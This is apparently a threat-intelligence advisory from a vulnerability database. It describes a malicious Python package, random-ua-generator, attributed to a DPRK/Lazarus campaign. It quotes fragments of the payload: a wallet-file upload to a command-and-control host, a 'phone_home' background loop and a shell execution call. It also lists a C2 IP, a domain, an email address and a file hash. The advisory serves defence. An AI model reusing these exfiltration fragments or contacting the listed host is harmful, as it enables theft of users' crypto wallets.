VDB
GCVE-110-OSM-2026-9185
GCVE-110-OSM-2026-9185
Advisory PublishedCVSS 9.6/10
APT malware detected: chai-max. Associated with threat actor(s): DPRK/Lazarus. Behaviors: data exfiltration, code execution.
DESTINATION
- custom-c2: 157.254.194.47 (primary, plaintext) in src/random_ua_generator/st.py
EXFIL
- Python File Upload to Remote in src/random_ua_generator/wg.py: "requests.post( "http://" + cnc + "/wallets", data=fdata, files="
- Python Background Thread Execution in src/random_ua_generator/st.py: "def phone_home(): global lock global kl while True: time.sleep(20) lock.acquire(..."
- Network Request in src/random_ua_generator/st.py: "requests.post("
- Network Request in src/random_ua_generator/wg.py: "requests.post("
ADDITIONAL FINDINGS
- Shell Command Execution in src/random_ua_generator/__init__.py: "subprocess.Popen("
- Chai-Max Campaign Indicators in src/random_ua_generator/wg.py: ".wallet""
PAYLOAD FILES
src/random_ua_generator/wg.py (+ src/random_ua_generator/st.py)
INDICATORS (IOCs)
- ipv4: 113.0.0.0, 134.0.0.0, 131.0.0.0, 132.0.0.0, 107.0.0.0
- domains: malutka.com.ua
- emails: v.nick41@malutka.com.ua
- payloadFileHash: 053cfec5d1bd413c6e88a3b5a61e7de157c7cc2987d21bc8a20108afe483e9bd
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | random-ua-generator | all (affected) | — |
Aliases
Browse GCVE Records
75,827 records in the GCVE database · Updated August 3, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.